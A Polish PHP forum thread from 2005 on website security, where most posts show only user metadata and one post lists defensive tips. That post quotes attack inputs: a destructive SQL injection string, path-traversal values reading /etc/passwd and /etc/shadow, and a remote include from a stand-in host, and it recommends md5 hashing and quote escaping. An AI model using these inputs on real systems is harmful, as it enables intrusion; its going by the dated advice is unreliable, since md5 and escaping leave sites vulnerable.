Nasze strony wykorzystują pliki cookies. Używamy cookies i podobnych m.in. w celach reklamowych i statystycznych oraz w celu dostosowania serwisów do potrzeb użytkowników. Mogą też stosować je nasi reklamodawcy, firmy badawcze oraz dostawcy aplikacji. W przeglądarce można zmienić ustawienia dotyczące cookies. Więcej informacji. Jeśli nie wyrażasz zgody, opuść tę stronę.

Bezpieczeństwo

Forum dyskusyjne poświęcone zagadnieniom związanym z tworzeniem serwisów z wykorzystaniem zaawansowanych technologii takich jak PHP, Perl, mySQL, ASP, CGI, XML, itp.

Moderator: Grupa pościgowa ;-)

Bezpieczeństwo

Postprzez DEXTER:) » 16 lipca 2005, o 12:33

DEXTER:)
Mega GURU
Mega GURU
 
Posty: 1366
Dołączył(a): 14 lipca 2004, o 11:27

Bezpieczeństwo

Postprzez januzi » 16 lipca 2005, o 12:35

januzi
Mega GURU
Mega GURU
 
Posty: 1431
Dołączył(a): 18 października 2002, o 13:53

Bezpieczeństwo

Postprzez DEXTER:) » 16 lipca 2005, o 12:58

DEXTER:)
Mega GURU
Mega GURU
 
Posty: 1366
Dołączył(a): 14 lipca 2004, o 11:27

Bezpieczeństwo

Postprzez januzi » 16 lipca 2005, o 13:07

4) 5) jak masz cos dzialajce na bazie, np. pobierasz tekst o numerze pobranym z adresu "select * from tabela where numer = $numer" ;
zgadnij co sie stanie, jesli zamiast liczby pojawi sie tam tekst jakis ? np "1 ; drop all" ? tam gdzie sie da nalezy (int)$zmienna, a tam gdzie nie, to trzeba przypilnowac zeby nie pojawily sie wpisy umozliwiajace dowolna operacje na bazie (dodawanie \ przed " i ' jest dosc skuteczne, zeby sie zabezpieczyc)

3) include ( $zmienna ) ; $zmienna = "../../../etc/passwd" ; $zmienna = "../../../etc/shadow" ; $zmienna = "http://bandzior/skrypt_na_serwerze_bez_php.php" ;

2) md5(), logowanie sie zachowywane tez w md5() np. jako zlozenie hasla+nick+costam

1) kontrola odbieranych plikow przed przeniesieniem do katalogu, kontrola obslugi formularza, tak aby nie mozna bylo go wywolac bezposrednio, kontrola wyslanych danych pod katem tego skad przyszly
teksty mozna znalezc na php.pl, kess.snug.pl ...
januzi
Mega GURU
Mega GURU
 
Posty: 1431
Dołączył(a): 18 października 2002, o 13:53

Postprzez kalu111 » 26 września 2005, o 08:50

co to znaczy : " kontrola obslugi formularza, tak aby nie mozna bylo go wywolac bezposrednio(..)" :?:
kalu111
Znawca tematu
Znawca tematu
 
Posty: 327
Dołączył(a): 30 grudnia 2004, o 15:38

Postprzez januzi » 26 września 2005, o 10:02

januzi
Mega GURU
Mega GURU
 
Posty: 1431
Dołączył(a): 18 października 2002, o 13:53

Postprzez kalu111 » 26 września 2005, o 13:33

kalu111
Znawca tematu
Znawca tematu
 
Posty: 327
Dołączył(a): 30 grudnia 2004, o 15:38

Postprzez januzi » 26 września 2005, o 15:40

januzi
Mega GURU
Mega GURU
 
Posty: 1431
Dołączył(a): 18 października 2002, o 13:53

Postprzez kalu111 » 27 września 2005, o 08:22

kalu111
Znawca tematu
Znawca tematu
 
Posty: 327
Dołączył(a): 30 grudnia 2004, o 15:38


Powrót do PHP, Perl, SQL, CGI, XML...

Kto przegląda forum

Użytkownicy przeglądający ten dział: Brak zidentyfikowanych użytkowników

cron